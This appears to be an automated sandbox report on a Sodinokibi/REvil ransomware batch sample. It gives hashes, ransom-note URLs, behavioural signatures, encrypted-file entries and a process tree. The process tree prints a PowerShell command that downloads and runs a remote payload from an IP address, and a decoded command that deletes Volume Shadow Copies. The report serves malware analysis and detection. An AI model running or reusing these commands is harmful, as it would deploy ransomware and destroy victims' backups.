Analysis
max time kernel: 134s
max time network: 54s
platform: windows7_x64
resource: win7v200430
submitted: 19-05-2020 05:10
Static task: static1
Behavioral task: behavioral1
  Sample: b63535d35f9c9567c0746741d709d3ec.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: b63535d35f9c9567c0746741d709d3ec.bat
  Resource: win10v200430
General
Target: b63535d35f9c9567c0746741d709d3ec.bat
Size: 215B
MD5: af820466ba8a425cc2616229818a51cf
SHA1: 9b8b46c04b3e16d6c6b98db7ed9423b2c7ba78bb
SHA256: 1a887694ba9f6fda88acd9489627ab0c6aecb03059490ece4c94af2007d9867c
SHA512: eb7f0b0f20201774182cedd5df9a0d22be50128cac83341bccee3521d86cd8f029f2f921b54fd17da28ffc9be3eb579dcd12207be8abd4c109bc9148fe59b186
Malware Config
Extracted from: http://185.103.242.78/pastes/b63535d35f9c9567c0746741d709d3ec
Extracted from: C:\03jxs-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F471805E27ADD53
    http://decryptor.cc/5F471805E27ADD53
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description                      pid   process         target process
  PID 1432 wrote to memory of 644  1432  cmd.exe         powershell.exe
  PID 644 wrote to memory of 1860  644   powershell.exe  powershell.exe  (4 identical entries)
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow  pid  process
  1     644  powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  pid  process
  644  powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  pid   process
  644   powershell.exe  (all remaining entries)
  1860  powershell.exe  (2 entries)
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description  ioc                                                                                process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer           vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer          vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
Drops file in Program Files directory (23 IoCs)
Processes: powershell.exe
  description                   ioc                                                                                  process
  File opened for modification  \??\c:\program files\ShowWait.wmx                                                    powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\03jxs-readme.txt      powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\03jxs-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\CheckpointConvert.vdx                                           powershell.exe
  File opened for modification  \??\c:\program files\CloseMeasure.tmp                                                powershell.exe
  File opened for modification  \??\c:\program files\DisableEdit.bmp                                                 powershell.exe
  File opened for modification  \??\c:\program files\LimitExit.iso                                                   powershell.exe
  File opened for modification  \??\c:\program files\NewProtect.M2V                                                  powershell.exe
  File opened for modification  \??\c:\program files\SaveMount.au3                                                   powershell.exe
  File opened for modification  \??\c:\program files\StopFormat.html                                                 powershell.exe
  File opened for modification  \??\c:\program files\UnpublishRename.xlsb                                            powershell.exe
  File created                  \??\c:\program files (x86)\03jxs-readme.txt                                          powershell.exe
  File opened for modification  \??\c:\program files\CompareInitialize.m4a                                           powershell.exe
  File opened for modification  \??\c:\program files\FindConfirm.dot                                                 powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\03jxs-readme.txt           powershell.exe
  File created                  \??\c:\program files\03jxs-readme.txt                                                powershell.exe
  File opened for modification  \??\c:\program files\ConvertUse.DVR-MS                                               powershell.exe
  File opened for modification  \??\c:\program files\LockUnblock.ppt                                                 powershell.exe
  File opened for modification  \??\c:\program files\UseReset.txt                                                    powershell.exe
  File opened for modification  \??\c:\program files\CheckpointHide.mpv2                                             powershell.exe
  File opened for modification  \??\c:\program files\OutOpen.wma                                                     powershell.exe
  File opened for modification  \??\c:\program files\RequestDisconnect.php                                           powershell.exe
  File opened for modification  \??\c:\program files\ResizeCopy.vdw                                                  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description      ioc                                                                                                              process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\475.bmp"  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  description                      pid   process
  Token: SeDebugPrivilege          644   powershell.exe
  Token: SeDebugPrivilege          644   powershell.exe
  Token: SeDebugPrivilege          1860  powershell.exe
  Token: SeBackupPrivilege         1580  vssvc.exe
  Token: SeRestorePrivilege        1580  vssvc.exe
  Token: SeAuditPrivilege          1580  vssvc.exe
  Token: SeTakeOwnershipPrivilege  644   powershell.exe
Processes

[level 1] C:\Windows\system32\cmd.exe
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\b63535d35f9c9567c0746741d709d3ec.bat"
  PID: 1432
  signatures:
    - Suspicious use of WriteProcessMemory

  [level 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b63535d35f9c9567c0746741d709d3ec');Invoke-GQWTYAZL;Start-Sleep -s 10000"
    PID: 644
    signatures:
      - Suspicious use of WriteProcessMemory
      - Blacklisted process makes network request
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: EnumeratesProcesses
      - Drops file in Program Files directory
      - Sets desktop wallpaper using registry
      - Suspicious use of AdjustPrivilegeToken

    [level 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of a UTF-16LE string; decoded: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of Volume Shadow Copies, which is what triggers the vssvc.exe activity below)
      PID: 1860
      signatures:
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[level 1] C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  PID: 1580
  signatures:
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken